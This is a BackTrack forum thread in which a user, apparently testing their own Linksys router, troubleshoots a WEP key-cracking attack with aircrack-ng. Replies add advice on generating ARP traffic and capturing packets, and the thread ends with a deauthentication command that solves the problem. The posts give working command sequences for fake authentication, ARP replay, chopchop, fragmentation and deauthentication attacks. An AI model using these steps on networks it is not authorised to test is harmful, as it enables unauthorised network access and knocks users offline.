Results 1 to 7 of 7

Thread: Cant get PRGA for WEP crack...

  1. #1
    Just burned his ISO
    Join Date
    Oct 2012
    Posts
    5

    Default Cant get PRGA for WEP crack...

    Cant get PRGA for WEP crack...


    "airmon-ng start wlan0"
    "airodump-ng mon0"

    ESSID: Linksys01
    BSSID: xx:xx:xx:xx:xx:xx
    Channel: 6

    "iwconfig wlan0 channel 6"
    "iwconfig mon0 channel 6"

    "airodump-ng mon0 -c 6 --bssid xx:xx:xx:xx:xx:xx"

    ...sniffing starts

    "aireplay-ng -1 0 -e Linksys01 -a xx:xx:xx:xx:xx:xx -h mm:mm:mm:mm:mm:mm"

    "Sending Authentication Request
    Authentication successful
    Sending Association Request
    Association successful :-)"

    [Can see my MAC show up under stations on airodump-ng sniff]
    [AUTH changes to OPN]

    ---------------------------------

    At this point I'm confused/stuck... i perform "ls" in /root. but no .xor file.

    I tried arpreply attack...

    "aireplay-ng -3 -b xx:xx:xx:xx:xx:xx mon0"

    It will continue to read packets and go no where.

    I tried a Chop Chop...

    "aireplay-ng -4 -b xx:xx:xx:xx:xx:xx -h mm:mm:mm:mm:mm:mm mon0"

    It will continue to read packets and go no where.

    I tried fragmentation...

    "aireplay-ng -5 -b xx:xx:xx:xx:xx:xx -h mm:mm:mm:mm:mm:mm mon0"

    It will continue to read packets and go no where.

    Tested packet injection (works). Tried keeping my mac the same and changing it. I even tried restarting and rebooting my VMware. Same thing. I find it odd that AUTH never changes to SKA.


    Any Ideas?


    ===============================================
    ROUTER: Linksys WRtT54G w/DD-WRT v24 sp2
    VMware player 5.0.0 build-812388 (4gig ram, 2 processors, 30 gig hard drive, Bridged network adapter)
    Back Track 5r3
    Alpha AWUS036H
    IBM x230

  2. #2
    Junior Member rastamouse's Avatar
    Join Date
    Oct 2012
    Posts
    32

    Default

    Many of these aireplay attacks will prompt you to confirm the use of a packet before it is used for an attack. Since this is not happening for any of your attacks, I would suggest that there are no data packets being broadcast. When conducting these exercises, I would recommend having at least one wired or wireless client on the network to generate traffic (for example by pinging non-existing hosts to generate ARPs).
    Last edited by rastamouse; 11-05-2012 at 05:51 AM.

  3. #3
    Moderated Member
    Join Date
    Oct 2011
    Posts
    44

    Default Re: Cant get PRGA for WEP crack...

    Quote Originally Posted by Daveneedlinux View Post
    Cant get PRGA for WEP crack...


    "airmon-ng start wlan0"
    "airodump-ng mon0"

    ESSID: Linksys01
    BSSID: xx:xx:xx:xx:xx:xx
    Channel: 6

    "iwconfig wlan0 channel 6"
    "iwconfig mon0 channel 6"

    "airodump-ng mon0 -c 6 --bssid xx:xx:xx:xx:xx:xx"

    ...sniffing starts

    "aireplay-ng -1 0 -e Linksys01 -a xx:xx:xx:xx:xx:xx -h mm:mm:mm:mm:mm:mm"

    "Sending Authentication Request
    Authentication successful
    Sending Association Request
    Association successful :-)"

    [Can see my MAC show up under stations on airodump-ng sniff]
    [AUTH changes to OPN]

    ---------------------------------

    At this point I'm confused/stuck... i perform "ls" in /root. but no .xor file.

    I tried arpreply attack...

    "aireplay-ng -3 -b xx:xx:xx:xx:xx:xx mon0"

    It will continue to read packets and go no where.

    I tried a Chop Chop...

    "aireplay-ng -4 -b xx:xx:xx:xx:xx:xx -h mm:mm:mm:mm:mm:mm mon0"

    It will continue to read packets and go no where.

    I tried fragmentation...

    "aireplay-ng -5 -b xx:xx:xx:xx:xx:xx -h mm:mm:mm:mm:mm:mm mon0"

    It will continue to read packets and go no where.

    Tested packet injection (works). Tried keeping my mac the same and changing it. I even tried restarting and rebooting my VMware. Same thing. I find it odd that AUTH never changes to SKA.


    Any Ideas?


    ===============================================
    ROUTER: Linksys WRtT54G w/DD-WRT v24 sp2
    VMware player 5.0.0 build-812388 (4gig ram, 2 processors, 30 gig hard drive, Bridged network adapter)
    Back Track 5r3
    Alpha AWUS036H
    IBM x230
    Yeah start using automated Wifi crackers; hackpack's airpwn, Gerix, etc. Easy, simple, fast.

  4. #4
    Just burned his ISO
    Join Date
    Oct 2012
    Location
    Underneath The Flying Spaghetti Monster.
    Posts
    3

    Default Re: Cant get PRGA for WEP crack...

    I don't know your ultimate goal, but here is a thread that may help a bit.

    http://www.backtrack-linux.org/forum...ad.php?t=42602

  5. #5
    Just burned his ISO
    Join Date
    Oct 2012
    Posts
    5

    Default Re: Cant get PRGA for WEP crack...

    Thanks.

    I didn't have a computer on the network. I have set up a laptop with a wireless connection, and just sent at continuous ping to the routers IP. New problem.

    Arp-reply
    ----------

    Read {packets} packets (got 0 ARP requests and 0 ACKs), sent 0 packets...(0 pps)

    (will continue to do this forever untill i Ctrl+c)

    Fragmentation
    --------------

    aireplay-ng -5 -b {BSSID} mon0

    Finds a packet

    I select "y" to use packet
    "Sending fragmented packet"
    "Got a deauthentication packet"
    "not enough acks, repeating...
    "Trying a LLC NULL packet"

    It will repeat this till "still nothing, trying another packet"

    and i repeat the process.

    Chop Chop
    ----------

    aireplay-ng -4 -b {BSSID} mon0

    Finds a packet

    I select "y" to use packet

    got several deauthenticaiton packets - pauseing 3 seconds for reconnection
    got several deauthenticaiton packets - pauseing 3 seconds for reconnection
    got several deauthenticaiton packets - pauseing 3 seconds for reconnection

    The chopchop attack appears to have failed

  6. #6
    Junior Member rastamouse's Avatar
    Join Date
    Oct 2012
    Posts
    32

    Default Re: Cant get PRGA for WEP crack...

    Taking a second look at some of the commands you've been using, I've noticed you are omitting the -w argument in airodump. This tells airodump to write all captured data to a file, which you will need to do if you want to obtain the WEP key later on. This isn't a solution to your problem - but one you will run into later.

    Pinging the router IP continuously will unlikely generate new ARPs, since the relevant details for this host are already stored in your clients ARP table. Try pinging an address that is not being used, this will cause a new ARP as the client tries to establish an IP-MAC Address relationship for that host (even though it doesn't exist).

    Make sure you are already sniffing and listening for ARPs - as soon as you try and ping this non-existent host, BT should detect the ARP.

  7. #7
    Just burned his ISO
    Join Date
    Oct 2012
    Posts
    5

    Default Re: Cant get PRGA for WEP crack...

    SOLVED:

    Thank you rastamouse, I did forget to incorporate -w into my commands. Also The problem seemed to be i wasn't performing a --deauth on the router

    "aireplay-ng -0 5 -a {BSSID} mon0"

    Once I had my airdump-ng locked onto the channel, and performed a --deauth, I was able to sniff the correct packets.

Similar Threads

  1. Aircrack-ng: Fakeauth against WEP-SKA w/ PRGA .xor
    By ThePistonDoctor in forum BackTrack 5 General Topics
    Replies: 8
    Last Post: 06-03-2012, 05:07 PM
  2. Aircrack-ng: Fakeauth against WEP-SKA w/ PRGA .xor
    By ThePistonDoctor in forum BackTrack 5 Beginners Section
    Replies: 4
    Last Post: 07-08-2011, 06:20 PM
  3. air crack
    By tasmatto in forum Discussioni Generali
    Replies: 8
    Last Post: 11-14-2009, 12:48 PM
  4. crack.pl
    By kalgecin in forum OLD Programming
    Replies: 2
    Last Post: 10-04-2009, 02:13 AM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •